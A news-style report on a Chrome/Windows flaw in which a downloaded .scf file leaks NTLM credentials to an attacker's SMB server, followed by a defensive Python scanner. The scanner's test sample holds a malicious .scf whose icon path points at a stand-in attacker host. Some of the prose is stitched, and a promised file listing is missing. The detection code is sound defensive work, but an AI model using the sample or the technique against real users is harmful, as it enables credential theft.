A Google Chrome vulnerability allows hackers to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The attack technique that enables the credential theft combines two different techniques, one borrowed from the Stuxnet campaign and the other from a technique demonstrated at a Black Hat conference by two security researchers.
The Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog that he found the flaw in a default configuration of Chrome running on Windows 10.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations, since “it enables the attacker to impersonate members of the organisation”. Hackers can also “immediately reuse” stolen credentials and the privileges gained to launch further attacks “on other users or gain access and control of IT resources”.
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and “taking necessary action.”
According to Stankovic, the attack is simple and involves victims being tricked into clicking on a malicious link, which triggers an automatic download of a Windows Explorer Shell Command File, or SCF file. The SCF file lies dormant until the victim opens the download folder, at which point Windows Explorer attempts to fetch the file’s icon from a server controlled by the attacker, authenticating to that server in the process. This in turn provides the attacker with the victim’s username and hashed password.
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals with SCF files; it also relates to how Windows handles them.
“Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password,” Stankovic warned.
.SCF file + SMB Protocol + Google Chrome
One such file type is Windows Explorer Shell Command File (.scf files). It supports some Windows Explorer commands like showing desktop or opening a Windows Explorer window. A .scf file, if stored on disk, retrieves an icon file when it’s loaded in a Windows Explorer window.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two concepts of SMB protocol and .scf file to devise a new type of hacking attack.
A .scf file can be used to trick Windows into authenticating a remote SMB server. This is how the contents of file will look like:
After a user downloads the file to their system, it is triggered as soon as the download folder is opened to view the file. Please note that one doesn’t need to click or open this file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server set up by the attacker. The server is ready to capture the user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to some external service that accepts such credentials.
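The mechanism described above (an .scf file whose icon reference points at a remote SMB host, triggered merely by opening the download folder) leaves a simple artefact on disk that a defender can look for. The following scanner is an added example written for this page, not DefenseCode's or Google's code: it parses the INI-style sections of each .scf file under a directory and flags any whose `IconFile` entry names a remote host via a UNC path or `file://` URL. The sample files, the host name `attacker.example` and the file names are constructed for the demonstration.

```python
"""Flag .scf files whose IconFile points at a remote host (added example)."""
import re
import tempfile
from pathlib import Path

# Hosts that a UNC-looking prefix may name without leaving the machine.
LOCAL_HOSTS = {"?", ".", "localhost", "127.0.0.1"}


def parse_scf(text):
    """Parse the [Section] / key=value layout of an .scf file.

    Returns {section: {key: value}} with section and key names lower-cased,
    since Explorer treats them case-insensitively.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text):
    """Return the remote host named by [Shell] IconFile, or None if benign.

    Both '\\\\host\\share\\x.ico' and 'file://host/share/x.ico' make Explorer
    open an SMB connection to 'host' when it renders the icon; a local path
    such as '%SystemRoot%\\system32\\SHELL32.dll,4' does not.
    """
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    ref = icon.replace("\\", "/")
    if ref.lower().startswith("file:"):
        ref = ref[len("file:"):]
    match = re.match(r"^//+([^/]+)/", ref)
    if not match:
        return None
    host = match.group(1)
    return None if host.lower() in LOCAL_HOSTS else host


def scan_downloads(directory):
    """Return [(path, host)] for every .scf file under `directory` whose icon
    lives on a remote host. Explorer matches the extension case-insensitively,
    so the scan does too."""
    findings = []
    for path in Path(directory).rglob("*"):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        host = remote_icon_host(text)
        if host:
            findings.append((str(path), host))
    return findings


# Constructed samples (not taken from the page): the stock "show desktop"
# shortcut with a local icon, and a file whose icon sits on a remote host.
BENIGN_SCF = (
    "[Shell]\nCommand=2\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,4\n"
    "[Taskbar]\nCommand=ToggleDesktop\n"
)
REMOTE_SCF = (
    "[Shell]\nCommand=2\nIconFile=\\\\attacker.example\\share\\icon.ico\n"
    "[Taskbar]\nCommand=ToggleDesktop\n"
)


def scan_sample_directory():
    """Write both samples into a temporary folder, scan it, and return
    (file name, host) pairs; this is the stand-alone demonstration."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "Show Desktop.scf").write_text(BENIGN_SCF, encoding="utf-8")
        (Path(tmp) / "download.scf").write_text(REMOTE_SCF, encoding="utf-8")
        return [(Path(p).name, host) for p, host in scan_downloads(tmp)]


if __name__ == "__main__":
    for name, host in scan_sample_directory():
        print(f"{name}: icon fetched from remote host {host}")
```

Run it against a user's Downloads folder by calling `scan_downloads(path)`; the demonstration function only exercises the constructed samples. The scan is a reactive check; since the credential leak happens over SMB, the complementary network-side control is to block outbound TCP 445 and 139 at the perimeter so the authentication attempt never reaches an external host.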